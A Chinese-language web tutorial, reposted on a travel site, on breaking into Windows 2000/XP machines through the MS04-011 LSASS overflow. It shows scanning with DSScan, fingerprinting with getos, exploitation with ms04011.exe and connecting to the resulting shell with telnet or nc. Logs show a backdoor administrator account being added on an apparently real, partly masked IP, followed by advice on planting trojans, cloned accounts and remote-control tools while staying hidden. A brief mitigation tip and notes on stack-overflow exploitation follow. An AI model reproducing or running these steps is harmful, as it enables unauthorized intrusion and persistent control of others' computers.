微软ms04011

来源：意榕旅游网

微软ms04011入侵

先打开一个针对该漏洞的工具压缩包,解压后可以里面有三个主要工具,分别是ms04011.exe ,getos.exe和DSScan.exe.

大家先拿出DSScan,这是一款针对该漏洞而编写出来的扫描器,打开后会看到很多选项,大家不用管它,保持默认就可以了,然后在Start IP和End IP里填上要扫描的起始地址,然后按一下旁边的\"->\"符号键,接着就可以开始扫描了.DSScan扫描速度非常快,不一会就找到了一台有该漏洞的主机,如图1所示. 注意：有\"VULNERABLE\"字样的就是有漏洞的啊！

接着在CMD里进入到存放ms04011.exe和getos.exe目录下,这里简单说明一下getos.exe的作用,它是一个用来猜测对方主机是2000或XP系统的命令,使用非

常简单,只要在命令后加上主机IP就可以了,但在实际运用中,笔者发现另一个问题可能会误导菜鸟,且看下图,图2是笔者用自己电脑做的实验,

由图可以知道,命令返回的判断结果是WINDOWS 2000 LAN Manager 和 windows 5.1,毕竟笔者也是初学者,以菜鸟的角度来思考,看到返回的结果是WINDOWS 2000 LAN Manager肯定大多数菜鸟门会判断对方主机就是WINDOWS 2000.这样就错了,笔者用的操作系统其实是WINDOWS XP,通过几次入侵后的比较,笔者发现windows 5.0的是win 2000系统的主机,而windows 5.1的则都是XP系统的主机.:) 至于ms04011.exe的用法也是很简单的,直接键入该命令按回车就能看到命令的详细使用方法,如果漏洞主机的系统是WIN 2K的话,就以ms04011 0 ip port的格式对漏洞主机会进行溢出了,其中port是自己随便填的,它是你溢出成功后要TELNET的端口.还有一样要提的就是在命令的使用帮助里port的后面还写着一项叫ConnectBackIP的参数,这个可以不用上的,笔者猜它的作用大概是反向连接.因为笔者机子是在内网里的,所以无法进行测试了.如果对方的系统是XP的话只要把ms04011后面跟的0改成1就行了,因为漏洞只存在于这两种系统的主机里,所以说只要直接用ms04011命令来对未知系统的主机进行两次溢出也是非常方便的,这就免去了用getos来判断对方系统这一步.(如果大家也觉得ms04011这个命令太长的话也可以学笔者这样直接把它重命名为ms.exe的.) 说了这么多,相信大家都郁闷了,图3是笔者成功溢出后telnet进漏洞主机预先设定的3344端口的截图,

结果很简单,没什么可以再描述的了,值得注意的是用ms04011溢出的时候,如果成功发送shellcode的话,ms04011是处于监听状态的,即cmd会停留在\"shellcode size 404\"这一行,只有在你另外打开一个CMD TELNET对方溢出设定的端口时,ms04011才会出现\"Ret value = xxx\"并返回根目录,这跟使用nc时很象.如果你输入的ms04011命令后立刻就返回到根目录而没有进入监听状态的话,可以换一个端口再试.

新的iis5的sslms04011溢出入侵工具

ms04011溢出入侵据测试，该漏洞入侵成功率高达 80%。准备工具：ms04011.cab

1、我们利用工具DSScan.exe扫瞄一个网段。我们这里选择192.168.101.1--192.168.101.2。我们选择192.168.101.220这个来试下。

2、利用getos.exe判断对方的系统。格式为：getos.exe ip 一般iis 5.0是 win2000 ， iis 5.1是 xp MSHOME Windows 2000 LAN Manager Windows 5.1 说明是xp的系统

3、利用ms04011.exe进行溢出。格式为：ms04011.exe 0or1 ip C:\\ms04011>ms04011.exe 1 192.168.101.220 shellcode size 404 当一段时间不动了，表示益处正在进行！一段时间以后。我们就可以telnet了！

4、当溢出完毕以后，我们在开个cmd，telnet上去。格式为：telnet ip 1234 （1234是端口号） C:\\WINDOWS\\system32>ipconfig Windows IP Configuration Ethernet adapter 本地连接: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.101.220 Subnet

Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.101.1 看到了吗？现在我们已经得到了一个对方的shell！

用里面的DSScan扫描，

有\"VULNERABLE\"字样的就是有漏洞的啊！在用getos判断系统类型，在用ms04011进行溢出！

getos判断系统类型是依靠139断口的，如果对方没开启139也可以判断目标是否开了5000来确定其为xp 溢出2k： ms04011 0 IP 溢出xp： ms04011 1 IP 如果光标停顿……

c:\\>nc IP 1234

----------------------------------------------------------------------------------------

操作过程

---------------------------------------------------------------------------------------- C:\\>getos 2**.159.31.96 ---------------------------- THCsmbgetOS v0.1 - gets gro by Johnny Cyberpunk ( ---------------------------- [*] Connecting Port 139.... [*] Sending session request. [*] Sending negotiation requ [*] Sending setup account re [*] Successful.... Remote OS: ---------- WORKGROUP

Windows 2000 LAN Manager Windows 5.1 C:\\>

C:\\>ms04011 1 2**.159.31.96 shellcode size 404 Ret value = 1727 C:\\>

C:\\>nc 2**.159.31.96 1234

D:\\WINDOWS\\system32>net user ygl 693761 /add

net user ygl 693761 /add 命令成功完成。

D:\\WINDOWS\\system32>net localgroup administrators ygl /add net localgroup administrators ygl /add 命令成功完成。[NextPage]

关闭RPC服务即可对付一般的MS04011远程溢出攻击命令是“net stop server”

不过每次重新启动计算机以后服务又会自动开启因为server服务默认是自动启动的

所以最好再在控制面板“管理工具——服务”中将server服务启动类型设成“手动”或者“已禁用” ---------------------------------------------------------------------------------------------------------- 留后门的方法很多管理帐户（克隆的不错）植入木马（反弹的更好）开启一些服务（telnet、33等）后门工具（winshell）

网管工具（DameWare NT Utilities） …………

不过要注意隐蔽自己噢！ [NextPage]

Windows Lsasrv.dll RPC [ms04011] 这个漏洞分析其实eeye写得很清楚了

只是攻击远程的方法eeye写得太复杂，mslug的办法很好 hack一个netapi32.dll，这样溢出代码就简单多了。

这个是个栈溢出，应该很好利用。在2k上溢出返回地址或seh都可以不过一个有意思的地方是这个bug溢出两个地址间隔有800个字节，所以可以先试ret再试seh 这样可以至少sp3,sp4一次搞定.

然后看xp eeye说xp只能用ascii 我看了果然是这样，而且问题是溢出的串不能太长，好像哪里会截断。所以好像没办法覆盖到seh 只能覆盖ret,而覆盖了ret后jmp esp还需要再向前跳，这样才可以运行shellcode.

但是2k如果不是unicode串,到不了溢出就返回了，所以如果要连xp一起一次搞定就需要对xp用unicode的shellcode.

好像2k,xp判断容易所以这个实在搞不定也没关系了。

因篇幅问题不能全部显示，请点此查看更多更全内容

查看全文